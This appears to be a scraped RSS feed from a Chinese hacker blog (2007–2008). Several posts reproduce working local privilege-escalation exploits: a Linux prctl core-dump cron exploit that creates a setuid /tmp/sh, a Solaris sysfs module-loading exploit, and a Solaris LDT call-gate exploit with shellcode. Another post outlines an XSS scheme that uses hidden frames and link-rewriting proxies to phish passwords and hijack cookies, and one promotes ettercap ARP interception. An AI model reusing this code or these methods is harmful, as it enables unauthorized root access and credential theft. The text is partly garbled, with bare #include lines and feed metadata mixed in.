http://www.greenarmy.org/index.php zh-cn http://www.greenarmy.org/post/16/ goodwell <admin@yourname.com> Tue, 01 Apr 2008 16:42:26 +0000 http://www.greenarmy.org/post/16/ 2008 年 Xss 蠕虫也许会和 cookie 注入一样成为黑客入侵的最前沿。

世面上流行的 xss 入侵无非是下面的几种方法
这里我摘用Monyer 写的文章 大家可以具体去看看
http://www.hacker57.cn/article.asp?id=346

当我们跨站成功后 可以指定跳转我们的页面，如果这是个框架页面比如 index.htm
包括了两个页面 1 和 页面 2 (页面 2 是隐藏的）通过写在 页面2 里 简单的 js 程序 我们可以控制页面 1里面的 地址转向
页面 1 先调用 用户正常访问的 页面 ，2分钟后 (通过页面2 的控制 跳转到指定的 密码输入钓鱼页面）

步骤1 跳转载入 index.htm



步骤 2通过页面 2 内 JS 可以 控制 延迟4000 毫秒后 页面1 自动跳转（指跳转一次）4分钟后 用户页面自动跳转



你还可以使用 java 读取 框架内 页面1 内的数据 并定时记录。==============================================

当然很多网站限制了 框架结构 会自动跳出这就需要利用另一个技术 HttpClient来模拟浏览器GET POSTXss

跳转 并传递cookie获取cookie 后 利用 http client 技术 模拟用户访问
他当前的页面获得用户正常访问的 页面代码同时替换所有 url
 比如 把 src=http://www.qq.com/file/admin.asp
替换成 src=http://xxx.com/demo.jsp? url=http://www.qq.com/file/admin.asp
print 输出

这时用户看到的是和原来页面一样的东西但是他这个时候的页面内的所有连接已经被我们替换，意味着他点击的连接会先连向我们的Demo.jsp 然后我们的 demo 会再此模拟他的cookie 去访问这些连接
Print 输出

也许你问这样做的意义是什么？
它可以记录用户从xss跳转后所有的 访问页面 和登陆信息 ]]> http://www.greenarmy.org/post/14/ goodwell <admin@yourname.com> Wed, 26 Mar 2008 19:38:54 +0000 http://www.greenarmy.org/post/14/ /* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer       (main PoC code)   */
/* - RoMaNSoFt (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -p");
} ]]> http://www.greenarmy.org/post/11/ goodwell <admin@yourname.com> Tue, 26 Feb 2008 17:24:41 +0000 http://www.greenarmy.org/post/11/ http://www.greenarmy.org/post/10/ goodwell <admin@yourname.com> Tue, 26 Feb 2008 17:16:15 +0000 http://www.greenarmy.org/post/10/ 结果却这么简单 .

已经可以ARP 窃听后窜改截获的数据包然后发送 而且非常稳定



============================================================================
                                ettercap 0.6.5                    2002-02-12
============================================================================

    Even if blessed with a feeble intelligence they are cruel and smart...


       @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@
       @@        @@@     @@@   @@      @@   @@ @@      @@   @@ @@   @@
       @@@@@@    @@@     @@@   @@@@@@  @@@@@@  @@      @@@@@@@ @@@@@@
       @@        @@@     @@@   @@      @@  @@  @@      @@   @@ @@
       @@@@@@@   @@@     @@@   @@@@@@@ @@  @@@ @@@@@@@ @@   @@ @@


                     Multi purpose sniffer/interceptor



         Required Libraries:              none ;)  (optionally ncurses)

         Optional Libraries:              openssl  (if you want ssh support)

         Installation:                    configure
                                          make
                                          make install

                         (optional)       make plug-ins
                                          make plug-ins_install

      (if you are lazy, just run)         make complete_install

============================================================================
                                    INTRO
============================================================================

Kiddie:   A friend of mine told me that it is possible to sniff on a LAN...
          so I bought a switch ;)

NaGoR:    mmhhh....

Kiddie:   Now my LAN is SECURE ! you can't sniff my packets... ah ah ah

NaGoR:    are you sure ? look at ettercap doing its work...

Kiddie:   Oh my god... it sniffs all my traffic !!
          I will use only ciphered connections on my LAN, so ettercap can't
          sniff them ! ah ah ah

NaGoR:    mmhhh....

Kiddie:   Now I'm using SSH.  My LAN is SECURE !

NaGoR:    are you sure ? look at ettercap doing its work...

Kiddie:   shit !!  grrrr...


"a false sense of security, is worse than insecurity"   -- Steve Gibson

hey folks... wake up !  the net is NOT secure !!

ettercap demonstrates that now is the time to encourage research on
internet protocols to make them more secure.

]]> http://www.greenarmy.org/post/9/ goodwell <admin@yourname.com> Tue, 26 Feb 2008 17:12:12 +0000 http://www.greenarmy.org/post/9/ *
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and  2004/04/07
*      
*                    
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/

#include
#include
#include
#include
#include

int do_root_me ()
{
  if (mkdir("/tmp/sparcv9", 0777) < 0) {
    perror ("mkdir");
    return -1;
  }
  
  system ("cp ./mod /tmp/sparcv9/");
  
  sysfs (GETFSIND, "../../tmp/mod");
  
  return 0;
}

int make_shell ()
{
  system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
  return 0;
}
  

int main()
{
  pid_t  child;
  
  make_shell ();
  child = fork ();
  if (child == -1)
    printf ("Unable to fork\n");

  if (child == 0)
    do_root_me();
  
  system("/usr/bin/rm -rf /tmp/sparcv9");
  printf ("press anykey ");  
  getchar ();
  execl ("/tmp/sh", "/tmp/sh", 0);
  
  return 0;
}

]]> http://www.greenarmy.org/post/8/ goodwell <admin@yourname.com> Tue, 26 Feb 2008 17:11:35 +0000 http://www.greenarmy.org/post/8/
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland        *://lsd-pl.net/ #*/
/*## ldt kernel bug                                                          #*/

/*   the code installs trap call gate descriptor with DPL=3 targeting kernel  */
/*   code segment selector KCSSEL (DPL=0) in task local descriptor table LDT  */
/*   through sysi86(SI86DSCR,struct ssd*) system call.                        */

/*   as a result command shell is spawned with effective root user privilege. */
/*   NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */

#include
#include
#include
#include
#include
#include
#include

#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt()  (ofs(cpu_t,cpu_thread))
#define ofscr()  (ofs(kthread_t,t_cred))
#define ofsid()  (ofs(cred_t,cr_uid))
#define adr(a)   (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d)   (char)(d),(char)(d>>8)

char asmcode[]={
   0x55,                      /* pushl   %ebp                   */
   0x89,0xe5,                 /* movl    %esp,%ebp              */
   0xe8,0,0,0,0,              /* call                */
   0x5c,                      /* popl    %esp                   */
   0x83,0xc4,0x0d,            /* addl    $0x0d,%esp             */
   0x9a,0,0,0,0,0x44,0,       /* lcall   $0x44,$0x00000000      */
   0xc9,                      /* leave                          */
   0xc3,                      /* ret                            */

   0x66,0xb8,dsc(KGSSEL),     /* movw    $0x????,%ax            */
   0x8e,0xe8,                 /* movw    %ax,%gs                */
   0x65,0xa1,adr(ofskt()),    /* movl    %gs:0x????????,%eax    */
   0x8b,0x88,adr(ofscr()),    /* movl    0x????????(%eax),%ecx  */
   0x31,0xc0,                 /* xorl    %eax,%eax              */
   0x89,0x41,ofsid(),         /* movl    %eax,0x??(%ecx)        */
   0xca,0x20,0                /* lret    $0x20                  */
};

main(int argc,char **argv){
   unsigned int adr;
   ucontext_t uc;struct ssd s;

   printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland  //lsd-pl.net/\n");
   printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");

   getcontext(&uc);
   adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);

   printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);

   s.bo=adr;
   s.sel=0x44;
   s.ls=KCSSEL;
   s.acc1=GATE_UACC|GATE_386CALL;
   s.acc2=8;

   sysi86(SI86DSCR,&s);
   setuid(getuid());
   ((void(*)())asmcode)();

   execl("/bin/ksh","lsd",0);
}
]]> http://www.greenarmy.org/post/7/ goodwell <admin@yourname.com> Mon, 24 Dec 2007 04:27:39 +0000 http://www.greenarmy.org/post/7/ http://www.greenarmy.org/post/6/ goodwell <admin@yourname.com> Tue, 27 Nov 2007 18:49:21 +0000 http://www.greenarmy.org/post/6/ ............

Tags - 黑客 , 绿色兵团 , littlefish , goodwell , whoami , shutdown , coldface , dspman , solo ]]> http://www.greenarmy.org/post/5/ goodwell <admin@yourname.com> Sat, 17 Nov 2007 20:19:52 +0000 http://www.greenarmy.org/post/5/ ............
]]> http://www.greenarmy.org/post/4/ goodwell <admin@yourname.com> Sat, 17 Nov 2007 18:45:54 +0000 http://www.greenarmy.org/post/4/ ............

Tags - littlefish , 黑客 ]]>